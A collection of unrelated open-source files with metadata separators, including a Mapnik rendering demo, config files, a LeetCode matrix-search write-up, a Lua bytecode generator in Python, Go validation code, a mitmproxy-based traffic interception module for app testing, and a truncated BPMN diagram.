r.set_filter(parse_expression("[CLASS] = 1"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(188,149,28));
put(line_sym,keys::stroke_width,7.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads1_style_1.add_rule(std::move(r));
}
m.insert_style("highway-border", std::move(roads1_style_1));
feature_type_style roads1_style_2;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 1"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(242,191,36));
put(line_sym,keys::stroke_width,5.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads1_style_2.add_rule(std::move(r));
}
m.insert_style("highway-fill", std::move(roads1_style_2));
// Populated Places
feature_type_style popplaces_style;
{
rule r;
{
text_symbolizer text_sym;
text_placements_ptr placement_finder = std::make_shared<text_placements_dummy>();
placement_finder->defaults.format_defaults.face_name = "DejaVu Sans Book";
placement_finder->defaults.format_defaults.text_size = 10.0;
placement_finder->defaults.format_defaults.fill = color(0,0,0);
placement_finder->defaults.format_defaults.halo_fill = color(255,255,200);
placement_finder->defaults.format_defaults.halo_radius = 1.0;
placement_finder->defaults.set_format_tree(std::make_shared<mapnik::formatting::text_node>(parse_expression("[GEONAME]")));
put<text_placements_ptr>(text_sym, keys::text_placements_, placement_finder);
r.append(std::move(text_sym));
}
popplaces_style.add_rule(std::move(r));
}
m.insert_style("popplaces", std::move(popplaces_style));
// layers
// Provincial polygons
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/boundaries";
p["encoding"]="utf8";
layer lyr("Provinces");
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("provinces");
lyr.set_srs(srs_lcc);
m.add_layer(lyr);
}
// Drainage
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/qcdrainage";
layer lyr("Quebec Hydrography");
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.set_srs(srs_lcc);
lyr.add_style("drainage");
m.add_layer(lyr);
}
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/ontdrainage";
layer lyr("Ontario Hydrography");
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.set_srs(srs_lcc);
lyr.add_style("drainage");
m.add_layer(lyr);
}
// Provincial boundaries
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/boundaries_l";
layer lyr("Provincial borders");
lyr.set_srs(srs_lcc);
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("provlines");
m.add_layer(lyr);
}
// Roads
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/roads";
layer lyr("Roads");
lyr.set_srs(srs_lcc);
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("smallroads");
lyr.add_style("road-border");
lyr.add_style("road-fill");
lyr.add_style("highway-border");
lyr.add_style("highway-fill");
m.add_layer(lyr);
}
// popplaces
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/popplaces";
p["encoding"] = "utf8";
layer lyr("Populated Places");
lyr.set_srs(srs_lcc);
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("popplaces");
m.add_layer(lyr);
}
m.zoom_to_box(box2d<double>(-8024477.28459,5445190.38849,-7381388.20071,5662941.44855));
image_rgba8 buf(m.width(),m.height());
agg_renderer<image_rgba8> ren(m,buf);
ren.apply();
std::string msg("These maps have been rendered using AGG in the current directory:\n");
#ifdef HAVE_JPEG
save_to_file(buf,"demo.jpg","jpeg");
msg += "- demo.jpg\n";
#endif
#ifdef HAVE_PNG
save_to_file(buf,"demo.png","png");
save_to_file(buf,"demo256.png","png8");
msg += "- demo.png\n";
msg += "- demo256.png\n";
#endif
#ifdef HAVE_TIFF
save_to_file(buf,"demo.tif","tiff");
msg += "- demo.tif\n";
#endif
#ifdef HAVE_WEBP
save_to_file(buf,"demo.webp","webp");
msg += "- demo.webp\n";
#endif
msg += "Have a look!\n";
std::cout << msg;
#if defined(HAVE_CAIRO)
// save to pdf/svg files
save_to_cairo_file(m,"cairo-demo.pdf");
save_to_cairo_file(m,"cairo-demo.svg");
/* we could also do:
save_to_cairo_file(m,"cairo-demo.png");
but instead let's build up a surface for more flexibility
*/
cairo_surface_ptr image_surface(
cairo_image_surface_create(CAIRO_FORMAT_ARGB32,m.width(),m.height()),
cairo_surface_closer());
double scale_factor = 1.0;
cairo_ptr image_context(create_context(image_surface));
mapnik::cairo_renderer<cairo_ptr> png_render(m,image_context,scale_factor);
png_render.apply();
// we can now write to png with cairo functionality
cairo_surface_write_to_png(&*image_surface, "cairo-demo.png");
// but we can also benefit from quantization by converting
// to a mapnik image object and then saving that
mapnik::image_rgba8 im_data(cairo_image_surface_get_width(&*image_surface), cairo_image_surface_get_height(&*image_surface));
cairo_image_to_rgba8(im_data, image_surface);
save_to_file(im_data, "cairo-demo256.png","png8");
cairo_surface_finish(&*image_surface);
std::cout << "Three maps have been rendered using Cairo in the current directory:\n"
"- cairo-demo.png\n"
"- cairo-demo256.png\n"
"- cairo-demo.pdf\n"
"- cairo-demo.svg\n"
"Have a look!\n";
#endif
// save map definition (data + style)
save_map(m, "map.xml");
}
catch ( std::exception const& ex )
{
std::cerr << "### std::exception: " << ex.what() << std::endl;
return EXIT_FAILURE;
}
catch ( ... )
{
std::cerr << "### Unknown exception." << std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<configuration>
<appSettings>
<add key="WebHostUrl2" value="http://mono.servicestack.net/docs/"/>
<add key="WebHostUrl" value="http://localhost:5416/"/>
</appSettings>
<!--
For a description of web.config changes see http://go.microsoft.com/fwlink/?LinkId=235367.
The following attributes can be set on the <httpRuntime> tag.
<system.Web>
<httpRuntime targetFramework="4.5" />
</system.Web>
-->
<system.web>
<httpHandlers>
<add path="*" type="ServiceStack.HttpHandlerFactory, ServiceStack" verb="*"/>
</httpHandlers>
<compilation debug="true" targetFramework="4.5">
<assemblies/>
</compilation>
<pages controlRenderingCompatibilityVersion="3.5" clientIDMode="AutoID"/>
</system.web>
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<handlers>
<add path="*" name="ServiceStack.Factory" type="ServiceStack.HttpHandlerFactory, ServiceStack" verb="*" preCondition="integratedMode" resourceType="Unspecified" allowPathInfo="true"/>
</handlers>
</system.webServer>
</configuration> | {
"pile_set_name": "Github"
} |
--TEST--
Vector-matrix multiplication test (column-major)
--FILE--
<?php
ini_set("qb.column_major_matrix", true);
/**
* @engine qb
* @local matrix2x4 $m
* @local vector2 $v
*/
function test_function() {
$m = array( array(1, 5),
array(2, 6),
array(3, 7),
array(4, 8) );
$v = array( 2, 4 );
echo $v * $m, "\n";
}
test_function();
?>
--EXPECT--
[22, 28, 34, 40]
| {
"pile_set_name": "Github"
} |
<!--
~ Copyright (C) 2015 The Android Open Source Project
~
~ Licensed under the Apache License, Version 2.0 (the "License");
~ you may not use this file except in compliance with the License.
~ You may obtain a copy of the License at
~
~ http://www.apache.org/licenses/LICENSE-2.0
~
~ Unless required by applicable law or agreed to in writing, software
~ distributed under the License is distributed on an "AS IS" BASIS,
~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
~ See the License for the specific language governing permissions and
~ limitations under the License
-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.test.hierarchyviewer">
<application>
<uses-library android:name="android.test.runner" />
<activity
android:name=".MainActivity"
android:label="HvTest" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
<instrumentation
android:name="android.test.InstrumentationTestRunner"
android:targetPackage="com.android.test.hierarchyviewer" />
</manifest>
| {
"pile_set_name": "Github"
} |
## 题目地址
https://leetcode.com/problems/search-a-2d-matrix-ii/description/
## 题目描述
```
Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:
Integers in each row are sorted in ascending from left to right.
Integers in each column are sorted in ascending from top to bottom.
Example:
Consider the following matrix:
[
[1, 4, 7, 11, 15],
[2, 5, 8, 12, 19],
[3, 6, 9, 16, 22],
[10, 13, 14, 17, 24],
[18, 21, 23, 26, 30]
]
Given target = 5, return true.
Given target = 20, return false.
```
## 前置知识
- 数组
## 公司
- 阿里
- 腾讯
- 百度
- 字节
## 思路
符合直觉的做法是两层循环遍历,时间复杂度是O(m * n),
有没有时间复杂度更好的做法呢? 答案是有,那就是充分运用矩阵的特性(横向纵向都递增),
我们可以从角落(左下或者右上)开始遍历,这样时间复杂度是O(m + n).

其中蓝色代表我们选择的起点元素, 红色代表目标元素。
## 关键点解析
- 从角落开始遍历,利用递增的特性简化时间复杂度
## 代码
代码支持:JavaScript, Python3
JavaScript Code:
```js
/*
* @lc app=leetcode id=240 lang=javascript
*
* [240] Search a 2D Matrix II
*
* https://leetcode.com/problems/search-a-2d-matrix-ii/description/
*
*
*/
/**
* @param {number[][]} matrix
* @param {number} target
* @return {boolean}
*/
var searchMatrix = function(matrix, target) {
if (!matrix || matrix.length === 0) return false;
let colIndex = 0;
let rowIndex = matrix.length - 1;
while(rowIndex > 0 && target < matrix[rowIndex][colIndex]) {
rowIndex --;
}
while(colIndex < matrix[0].length) {
if (target === matrix[rowIndex][colIndex]) return true;
if (target > matrix[rowIndex][colIndex]) {
colIndex ++;
} else if (rowIndex > 0){
rowIndex --;
} else {
return false;
}
}
return false;
};
```
Python Code:
```python
class Solution:
def searchMatrix(self, matrix, target):
m = len(matrix)
if m == 0:
return False
n = len(matrix[0])
i = m - 1
j = 0
while i >= 0 and j < n:
if matrix[i][j] == target:
return True
if matrix[i][j] > target:
i -= 1
else:
j += 1
return False
```
| {
"pile_set_name": "Github"
} |
#
# TinCanTools Flyswatter
#
# http://www.tincantools.com/product.php?productid=16134
#
interface ft2232
ft2232_device_desc "Flyswatter"
ft2232_layout "flyswatter"
ft2232_vid_pid 0x0403 0x6010
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<TargetFrameworks>net452;net462</TargetFrameworks>
<IsPackable>false</IsPackable>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
<Configurations>Debug;Release</Configurations>
<Platforms>AnyCPU;x86;x64</Platforms>
</PropertyGroup>
<ItemGroup>
<ProjectReference Include="..\K4os.Compression.LZ4.vPrev\K4os.Compression.LZ4.vPrev.csproj" />
<ProjectReference Include="..\K4os.Compression.LZ4\K4os.Compression.LZ4.csproj" />
<ProjectReference Include="..\TestHelpers\TestHelpers.csproj" />
</ItemGroup>
<Import Project="..\..\.paket\Paket.Restore.targets" />
</Project> | {
"pile_set_name": "Github"
} |
//
// OOAttandanceTotalItemCell.swift
// O2Platform
//
// Created by 刘振兴 on 2018/5/23.
// Copyright © 2018年 zoneland. All rights reserved.
//
import UIKit
class OOAttandanceTotalItemCell: UITableViewCell,Configurable {
@IBOutlet weak var iconLabel: UILabel!
@IBOutlet weak var checkinDateLabel: UILabel!
@IBOutlet weak var startTimeLabel: UILabel!
@IBOutlet weak var endTimeLabel: UILabel!
override func awakeFromNib() {
super.awakeFromNib()
iconLabel.layer.cornerRadius = 10
iconLabel.layer.masksToBounds = true
}
override func setSelected(_ selected: Bool, animated: Bool) {
super.setSelected(selected, animated: animated)
// Configure the view for the selected state
}
func config(withItem item: Any?) {
guard let model = item as? OOAttandanceCheckinTotal else {
return
}
checkinDateLabel.text = model.recordDateString
startTimeLabel.text = model.onDutyTime
endTimeLabel.text = model.offDutyTime
if model.isLate == true {
self.iconLabel.text = "迟"
self.iconLabel.backgroundColor = UIColor(hex: "#F5A623")
}else if model.isLeaveEarlier == true {
self.iconLabel.text = "早"
self.iconLabel.backgroundColor = UIColor(hex: "#AC71E3")
}else if model.isGetSelfHolidays == true {
self.iconLabel.text = "假"
self.iconLabel.backgroundColor = UIColor(hex: "#4FB2E3")
}else {
self.iconLabel.text = "正"
self.iconLabel.backgroundColor = UIColor(hex: "#FB4747")
}
}
}
| {
"pile_set_name": "Github"
} |
BOOST_URL = https://dl.bintray.com/boostorg/release/1.74.0/source/boost_1_74_0.tar.bz2
BOOST_ALTERNATIVE_URL = https://sourceforge.net/projects/boost/files/boost/1.74.0/boost_1_74_0.tar.bz2/download
BOOST_MD5 = 83bfc1507731a0906e387fc28b7ef5417d591429e51e788417fe9ff025e116b1
BOOST_TARBALL_NAME = $(notdir $(BOOST_URL))
BOOST_TARBALL = $(DOWNLOAD_DIR)/$(BOOST_TARBALL_NAME)
BOOST_BASE_NAME = $(patsubst %.tar.bz2,%,$(BOOST_TARBALL_NAME))
BOOST_SRC = $(OUT)/src/$(BOOST_BASE_NAME)
BOOST_PATCHES_DIR = $(topdir)/lib/boost/patches
BOOST_PATCHES = $(addprefix $(BOOST_PATCHES_DIR)/,$(shell cat $(BOOST_PATCHES_DIR)/series))
$(BOOST_TARBALL): | $(DOWNLOAD_DIR)/dirstamp
@$(NQ)echo " GET $@"
$(Q)./build/download.py $(BOOST_URL) $(BOOST_ALTERNATIVE_URL) $(BOOST_MD5) $(DOWNLOAD_DIR)
BOOST_UNTAR_STAMP = $(OUT)/src/stamp-$(BOOST_BASE_NAME)
$(BOOST_UNTAR_STAMP): $(BOOST_TARBALL) $(BOOST_PATCHES_DIR)/series $(BOOST_PATCHES) | $(OUT)/src/dirstamp
@$(NQ)echo " UNTAR $(BOOST_TARBALL_NAME)"
$(Q)rm -rf $(BOOST_SRC)
$(Q)tar xjfC $< $(OUT)/src
$(Q)cd $(BOOST_SRC) && QUILT_PATCHES=$(abspath $(BOOST_PATCHES_DIR)) quilt push -a -q
@touch $@
.PHONY: boost
boost: $(BOOST_UNTAR_STAMP)
# We use only the header-only Boost libraries, so no linker flags
# required.
BOOST_LDLIBS =
# reduce Boost header bloat a bit
BOOST_CPPFLAGS = -isystem $(OUT)/src/$(BOOST_BASE_NAME)
BOOST_CPPFLAGS += -DBOOST_NO_IOSTREAM -DBOOST_MATH_NO_LEXICAL_CAST
BOOST_CPPFLAGS += -DBOOST_UBLAS_NO_STD_CERR
BOOST_CPPFLAGS += -DBOOST_ERROR_CODE_HEADER_ONLY
BOOST_CPPFLAGS += -DBOOST_SYSTEM_NO_DEPRECATED
BOOST_CPPFLAGS += -DBOOST_NO_STD_LOCALE -DBOOST_LEXICAL_CAST_ASSUME_C_LOCALE
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "83.5x83.5",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "1024x1024",
"idiom" : "ios-marketing",
"filename" : "[email protected]",
"scale" : "1x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
| {
"pile_set_name": "Github"
} |
from lua_exp import *
from func_info import FuncInfo
from lua_token import TokenKind
from lua_opcode import OpCode
class ArgAndKind:
def __init__(self, arg, kind):
self.arg = arg
self.kind = kind
class CodegenExp:
@staticmethod
def process_exp(fi, exp, a, n):
if isinstance(exp, NilExp):
fi.emit_load_nil(a, n)
elif isinstance(exp, FalseExp):
fi.emit_load_bool(a, 0, 0)
elif isinstance(exp, TrueExp):
fi.emit_load_bool(a, 1, 0)
elif isinstance(exp, IntegerExp):
fi.emit_load_k(a, exp.val)
elif isinstance(exp, FloatExp):
fi.emit_load_k(a, exp.val)
elif isinstance(exp, StringExp):
fi.emit_load_k(a, exp.s)
elif isinstance(exp, ParensExp):
CodegenExp.process_exp(fi, exp.exp, a, 1)
elif isinstance(exp, VarArgExp):
CodegenExp.process_vararg_exp(fi, a, n)
elif isinstance(exp, FuncDefExp):
CodegenExp.process_func_def_exp(fi, exp, a)
elif isinstance(exp, TableConstructorExp):
CodegenExp.process_table_constructor_exp(fi, exp, a)
elif isinstance(exp, UnopExp):
CodegenExp.process_unop_exp(fi, exp, a)
elif isinstance(exp, BinopExp):
CodegenExp.process_binop_exp(fi, exp, a)
elif isinstance(exp, ConcatExp):
CodegenExp.process_concat_exp(fi, exp, a)
elif isinstance(exp, NameExp):
CodegenExp.process_name_exp(fi, exp, a)
elif isinstance(exp, TableAccessExp):
CodegenExp.process_table_access_exp(fi, exp, a)
elif isinstance(exp, FuncCallExp):
CodegenExp.process_func_call_exp(fi, exp, a, n)
@staticmethod
def process_vararg_exp(fi, a, n):
if not fi.is_vararg:
raise Exception('cannot use "..." outside a vararg function')
fi.emit_vararg(a, n)
@staticmethod
def process_func_def_exp(fi, exp, a):
from codegen_block import CodegenBlock
sub_fi = FuncInfo(fi, exp)
fi.sub_funcs.append(sub_fi)
if exp.par_list is not None:
for param in exp.par_list:
sub_fi.add_local_var(param)
CodegenBlock.gen_block(sub_fi, exp.block)
sub_fi.exit_scope()
sub_fi.emit_return(0, 0)
bx = len(fi.sub_funcs) - 1
fi.emit_closure(a, bx)
@staticmethod
def process_table_constructor_exp(fi, exp, a):
narr = 0
for key_exp in exp.key_exps:
if key_exp is None:
narr += 1
nexps = len(exp.key_exps)
mult_ret = nexps > 0 and ExpHelper.is_vararg_or_func_call(exp.val_exps[-1])
fi.emit_new_table(a, narr, nexps-narr)
arr_idx = 0
for i in range(len(exp.key_exps)):
key_exp = exp.key_exps[i]
val_exp = exp.val_exps[i]
if key_exp is None:
arr_idx += 1
tmp = fi.alloc_reg()
if i == nexps - 1 and mult_ret:
CodegenExp.process_exp(fi, val_exp, tmp, -1)
else:
CodegenExp.process_exp(fi, val_exp, tmp, 1)
if arr_idx % 50 == 0 or arr_idx == narr:
n = arr_idx % 50
if n == 0:
n = 50
fi.free_regs(n)
c = (arr_idx - 1) // 50 + 1
if i == nexps - 1 and mult_ret:
fi.emit_set_list(a, 0, c)
else:
fi.emit_set_list(a, n, c)
continue
b = fi.alloc_reg()
CodegenExp.process_exp(fi, key_exp, b, 1)
c = fi.alloc_reg()
CodegenExp.process_exp(fi, val_exp, c, 1)
fi.free_regs(2)
fi.emit_set_table(a, b, c)
@staticmethod
def process_unop_exp(fi, exp, a):
b = fi.alloc_reg()
CodegenExp.process_exp(fi, exp.exp, b, 1)
fi.emit_unary_op(exp.op, a, b)
fi.free_reg()
@staticmethod
def process_binop_exp(fi, exp, a):
if exp.op == TokenKind.OP_AND or exp.op == TokenKind.OP_OR:
b = fi.alloc_reg()
CodegenExp.process_exp(fi, exp.exp1, b, 1)
fi.free_reg()
if exp.op == TokenKind.OP_AND:
fi.emit_test_set(a, b, 0)
else:
fi.emit_test_set(a, b, 1)
pc_of_jmp = fi.emit_jmp(0, 0)
b = fi.alloc_reg()
CodegenExp.process_exp(fi, exp.exp2, b, 1)
fi.free_reg()
fi.emit_move(a, b)
fi.fix_sbx(pc_of_jmp, fi.pc()-pc_of_jmp)
else:
b = fi.alloc_reg()
CodegenExp.process_exp(fi, exp.exp1, b, 1)
c = fi.alloc_reg()
CodegenExp.process_exp(fi, exp.exp2, c, 1)
fi.emit_binary_op(exp.op, a, b, c)
fi.free_regs(2)
@staticmethod
def process_concat_exp(fi, exp, a):
for sub_exp in exp.exps:
a1 = fi.alloc_reg()
CodegenExp.process_exp(fi, sub_exp, a1, 1)
c = fi.used_regs - 1
b = c - len(exp.exps) + 1
fi.free_regs(c - b + 1)
fi.emit_abc(OpCode.CONCAT, a, b, c)
@staticmethod
def process_name_exp(fi, exp, a):
r = fi.slot_of_local_var(exp.name)
if r >= 0:
fi.emit_move(a, r)
return
idx = fi.index_of_upval(exp.name)
if idx >= 0:
fi.emit_get_upval(a, idx)
return
prefix_exp = NameExp(exp.line, '_ENV')
key_exp = StringExp(exp.line, exp.name)
table_access_exp = TableAccessExp(exp.line, prefix_exp, key_exp)
CodegenExp.process_table_access_exp(fi, table_access_exp, a)
@staticmethod
def process_table_access_exp(fi, exp, a):
b = fi.alloc_reg()
CodegenExp.process_exp(fi, exp.prefix_exp, b, 1)
c = fi.alloc_reg()
CodegenExp.process_exp(fi, exp.key_exp, c, 1)
fi.emit_get_table(a, b, c)
fi.free_regs(2)
@staticmethod
def process_func_call_exp(fi, exp, a, n):
nargs = CodegenExp.process_prep_func_call(fi, exp, a)
fi.emit_call(a, nargs, n)
@staticmethod
def process_tail_call_exp(fi, exp, a):
nargs = CodegenExp.process_prep_func_call(fi, exp, a)
fi.emit_tail_call(a, nargs)
@staticmethod
def process_prep_func_call(fi, exp, a):
nargs = len(exp.args)
last_arg_is_vararg_or_fkunc_call = False
CodegenExp.process_exp(fi, exp.prefix_exp, a, 1)
if exp.name_exp is not None:
c = 0x100 + fi.index_of_constant(exp.name_exp.s)
fi.emit_self(a, a, c)
for i in range(len(exp.args)):
arg = exp.args[i]
tmp = fi.alloc_reg()
if i == nargs - 1 and ExpHelper.is_vararg_or_func_call(arg):
last_arg_is_vararg_or_fkunc_call = True
CodegenExp.process_exp(fi, arg, tmp, -1)
else:
CodegenExp.process_exp(fi, arg, tmp, 1)
fi.free_regs(nargs)
if exp.name_exp is not None:
nargs += 1
if last_arg_is_vararg_or_fkunc_call:
nargs = -1
return nargs
| {
"pile_set_name": "Github"
} |
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package validation
import (
"bytes"
"encoding/json"
"fmt"
ejson "github.com/exponent-io/jsonpath"
utilerrors "k8s.io/apimachinery/pkg/util/errors"
)
// Schema is an interface that knows how to validate an API object serialized to a byte array.
type Schema interface {
ValidateBytes(data []byte) error
}
// NullSchema always validates bytes.
type NullSchema struct{}
// ValidateBytes never fails for NullSchema.
func (NullSchema) ValidateBytes(data []byte) error { return nil }
// NoDoubleKeySchema is a schema that disallows double keys.
type NoDoubleKeySchema struct{}
// ValidateBytes validates bytes.
func (NoDoubleKeySchema) ValidateBytes(data []byte) error {
var list []error
if err := validateNoDuplicateKeys(data, "metadata", "labels"); err != nil {
list = append(list, err)
}
if err := validateNoDuplicateKeys(data, "metadata", "annotations"); err != nil {
list = append(list, err)
}
return utilerrors.NewAggregate(list)
}
func validateNoDuplicateKeys(data []byte, path ...string) error {
r := ejson.NewDecoder(bytes.NewReader(data))
// This is Go being unfriendly. The 'path ...string' comes in as a
// []string, and SeekTo takes ...interface{}, so we can't just pass
// the path straight in, we have to copy it. *sigh*
ifacePath := []interface{}{}
for ix := range path {
ifacePath = append(ifacePath, path[ix])
}
found, err := r.SeekTo(ifacePath...)
if err != nil {
return err
}
if !found {
return nil
}
seen := map[string]bool{}
for {
tok, err := r.Token()
if err != nil {
return err
}
switch t := tok.(type) {
case json.Delim:
if t.String() == "}" {
return nil
}
case ejson.KeyString:
if seen[string(t)] {
return fmt.Errorf("duplicate key: %s", string(t))
}
seen[string(t)] = true
}
}
}
// ConjunctiveSchema encapsulates a schema list.
type ConjunctiveSchema []Schema
// ValidateBytes validates bytes per a ConjunctiveSchema.
func (c ConjunctiveSchema) ValidateBytes(data []byte) error {
var list []error
schemas := []Schema(c)
for ix := range schemas {
if err := schemas[ix].ValidateBytes(data); err != nil {
list = append(list, err)
}
}
return utilerrors.NewAggregate(list)
}
| {
"pile_set_name": "Github"
} |
from core.framework.module import BaseModule
from core.utils.utils import Utils
class Module(BaseModule):
meta = {
'name': 'Intercepting Proxy',
'author': '@LanciniMarco (@MWRLabs)',
'description': 'Intercept the traffic generated by the device. Read the comments below before starting.',
'options': (
('port', 9090, True, 'Proxy service port.'),
('verbose', False, True, 'Verbose output (print the HTTP headers of every request/response).'),
('anticache', True, True, 'Strip out request headers that might cause the server to return 304-not-modified.'),
('output', True, False, 'Full path of the output dump file.'),
('upstream_ip', False, False, 'Upstream proxy server IP (to forward all requests to).'),
('upstream_port', False, False, 'Upstream proxy server PORT (to forward all requests to).'),
('target_domain', "", False, 'Comma separated list of the domains to analyze (Example: domain.com,other.com). If empty, everything will be in scope.'),
),
'comments': ['Connect this workstation and the device to the same Wi-Fi',
'Configure the device to use this host as proxy',
'Run `comms/certs/install_ca_mitm` to install the CA Certificate of MitmProxy on the device',
'Notice that, due to a current bug in Mitmproxy, if an upstream proxy is set, the logging functionality will not work (i.e., the output file will be empty)']
}
# ==================================================================================================================
# UTILS
# ==================================================================================================================
def __init__(self, params):
BaseModule.__init__(self, params)
# Setting default output file
self.options['output'] = self.local_op.build_output_path_for_file("proxy_regular.out", self)
def module_pre(self):
return BaseModule.module_pre(self, bypass_app=True)
# ==================================================================================================================
# RUN
# ==================================================================================================================
def module_run(self):
# Parse variables
port = self.options['port']
verbose = self.options['verbose']
anticache = self.options['anticache']
output = self.options['output']
upstream_ip = self.options['upstream_ip']
upstream_port = self.options['upstream_port']
target_domain = self.options['target_domain']
# Check upstream
upstream_list = [upstream_ip, upstream_port]
if None in upstream_list or False in upstream_list:
upstream = False
if any(upstream_list):
self.printer.error('Please specify both the IP and PORT of the upstream proxy (or remove them both).')
return
else:
upstream = True
# Build command string
cmd = "{proxyapp} -p {port}".format(proxyapp=self.TOOLS_LOCAL['MITMDUMP'],
port=port)
if verbose: cmd += ' -d'
if anticache: cmd += ' --anticache'
if output: cmd += ' --wfile {}'.format(output)
if upstream: cmd += ' --upstream http://{ip}:{port}'.format(ip=upstream_ip, port=upstream_port)
if target_domain:
domain_list = map(Utils.regex_escape_str, target_domain.split(','))
domain_list_string = ''.join(['(?!{})'.format(el) for el in domain_list])
cmd += " --ignore '^{}'".format(domain_list_string)
# Intercept
self.printer.notify('Configure the device to use this host as proxy: {ip}:{port}'.format(ip=self.local_op.get_ip(), port=port))
self.printer.info('Starting intercepting proxy. Press Ctrl-c to quit.')
self.local_op.command_interactive(cmd)
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<bpmn:definitions xmlns:bpmn="http://www.omg.org/spec/BPMN/20100524/MODEL" xmlns:bpmndi="http://www.omg.org/spec/BPMN/20100524/DI" xmlns:di="http://www.omg.org/spec/DD/20100524/DI" xmlns:dc="http://www.omg.org/spec/DD/20100524/DC" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" id="Definitions_1" targetNamespace="http://bpmn.io/schema/bpmn" exporter="Camunda Modeler" exporterVersion="1.8.2">
<bpmn:process id="Process_1" isExecutable="false">
<bpmn:startEvent id="StartEvent_1">
<bpmn:outgoing>SequenceFlow_0j6tsnn</bpmn:outgoing>
</bpmn:startEvent>
<bpmn:sequenceFlow id="SequenceFlow_0j6tsnn" sourceRef="StartEvent_1" targetRef="Task_1b1r7ow" />
<bpmn:serviceTask id="Task_1b1r7ow" name="Order Articles">
<bpmn:incoming>SequenceFlow_0j6tsnn</bpmn:incoming>
<bpmn:outgoing>SequenceFlow_0baemzs</bpmn:outgoing>
</bpmn:serviceTask>
<bpmn:sequenceFlow id="SequenceFlow_0baemzs" sourceRef="Task_1b1r7ow" targetRef="Task_1t0a4uy" />
<bpmn:serviceTask id="Task_162x79i" name="Ship Articles">
<bpmn:incoming>SequenceFlow_0cu1bs2</bpmn:incoming>
<bpmn:outgoing>SequenceFlow_19klrd3</bpmn:outgoing>
</bpmn:serviceTask>
<bpmn:endEvent id="EndEvent_042s0oc">
<bpmn:incoming>SequenceFlow_19klrd3</bpmn:incoming>
</bpmn:endEvent>
<bpmn:sequenceFlow id="SequenceFlow_19klrd3" sourceRef="Task_162x79i" targetRef="EndEvent_042s0oc" />
<bpmn:sequenceFlow id="SequenceFlow_0cu1bs2" sourceRef="Task_1t0a4uy" targetRef="Task_162x79i" />
<bpmn:serviceTask id="Task_1t0a4uy" name="Debit totalPrice">
<bpmn:incoming>SequenceFlow_0baemzs</bpmn:incoming>
<bpmn:outgoing>SequenceFlow_0cu1bs2</bpmn:outgoing>
</bpmn:serviceTask>
</bpmn:process>
<bpmndi:BPMNDiagram id="BPMNDiagram_1">
